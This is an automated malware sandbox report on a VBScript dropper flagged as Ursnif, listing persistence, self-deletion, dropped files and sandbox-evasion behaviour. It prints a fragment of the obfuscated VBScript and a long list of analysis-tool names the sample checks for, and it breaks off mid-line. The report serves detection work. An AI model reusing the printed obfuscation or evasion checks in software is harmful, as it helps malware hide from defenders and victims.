            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: e:\Said\44\1\office\84\Decimal\97\School\check\33\65\Change\Blue\58\Hold.pdb source: Mardi.rm.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(847811303)) > 0 And lwgUgj = 0) ThenREM agar downtown254 radiometer. Alger881 massif incandescent upholster phthalate infringe505 actuarial Stuyvesant426 Seagram ceil gavotte pavanne deal acquaint potpourri agent Strickland snarl impugn inflow enchantress afterglow walla typesetting346 papery Galilean venetian tachinid duke neurosis82 stone Alsop735 legislature. 3984689 ourselves Middletown Boston. 8865891 caiman inter949 trailhead hotbed gravitometer Rudolf comprehension woodlot102 rockaway60 bride insuppressible Roland. banjo Jericho discus Egyptology Leone992 Calder Jeres168 portfolio tick memorandum nun guerdon ad waitress teaspoon quiescent haberdashery413 snivel wall808, 3662841 repairmen944 aircraft fish suspend estop cherubim dervish goldsmith21 purl casebook oppression90 Nebraska niggardly conjoin Whitney diagnostic coronary Exit Function' retrograde tetravalent nodular contraceptive1000 Siegfried, 7635598 permit butterscotch20. 397239 Iranian stumpy chew694 Burtt talus lilt macaw triennial fence, Napoleonic55 fumarole Rayleigh glutinous coastline harpsichord262, sanitate statue486 abrasion facade sorrow424 appropriable handicraft lard dulse crop Conway birch715 Rensselaer accompany Java, Huffman216 bluestocking205. candlewick. 2410549 septuagenarian salad inchworm Algonquian834. granular inflow946 holography contempt21 crow Sylow programmatic505 chugging snout veranda. geology915 superstitious latter. instructor constructible pact. 24640 TTY193 Reuters Munich mozzarella line oleomargarine microbial739 thyronine612 consider atrophic aside doubleheader End Ifset convulsive209 = GetObject("winmgmts:\\.\root\cimv2")set paranoiac949lOS = convulsive209.InstancesOf("Win32_OperatingSystem")for each BmsCmAs in paranoiac949lOSrummy709 = BmsCmAs.LastBootUpTimeVinOkID = Mid(rummy709,1,4) & "-" & Mid(rummy709,5,2) & "-" & Mid(rummy709,7,2) & " " & Mid(rummy709,9,2) & ":" & Mid(rummy709,11,2) & ":" & Mid(rummy709,13,2)fCnuPqec = abs(datediff("s",VinOkID,now))talcum = fCnuPqec \ 60CWXya = talcum \ 60' Isadore spacious297 coolheaded, bond, kwashiorkor Hoagland ransom114 inlaid84 Hines cocoon Malabar oocyte townsman mimeograph. nature invasion roundhead. 9691090 prosecutor Herculean symphonic frog Harlem. quandary upbeat towel Euphrates Markovian362 knowledge337 heretofore suspend378 train deleterious. 951307 face axial615 elementary began agnostic. Anglo corpora Millard. solecism mystery drophead652 series offspring hazard rigid Cameroun volcanism113 phosphorescent787 Sus mangrove ancillary upbeat977 stockroom. horoscope debar, talcum = talcum mod 60REM brae fledge spikenard auspice balm detail fad bounty libation largemouth Posner257 sunfish folksong alkali Plato crappie height corpse Ciceronian kale paradigmatic dark bone airflow. Jupiter265 lemming, 7953719 isomer bowmen3 antipode hysterectomy betony godparent amateur uptake hebephrenic Dutton miasma tapeworm eyelid Skopje republican immodesty protrusion porphyry w

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Mardi.rmJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Mardi.rmJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.388410277.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388483202.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388462091.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388313848.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388384941.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388506771.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388360455.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388280656.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\dgdvetycremx.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE88
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: PEID.EXE@#Z
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE@
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE@A
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEP
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE06
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE(
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE@:V
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: SANDBOXIERPCSS.EXE@V5
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE5
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE2
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE
            Source: wscript.exe, 00000000.00000003.260914754.0000018688F80000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE7
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Mardi.rmJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 7140Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: iexplore.exe, 0000001B.00000002.482442404.0000000000A57000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: Mardi.rm.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\irresistible.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\irresistible.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\irresistible.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\irresistible.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\irresistible.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\irresistible.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\irresistible.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\irresistible.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.260914754.0000018688F80000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.260914754.0000018688F80000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: <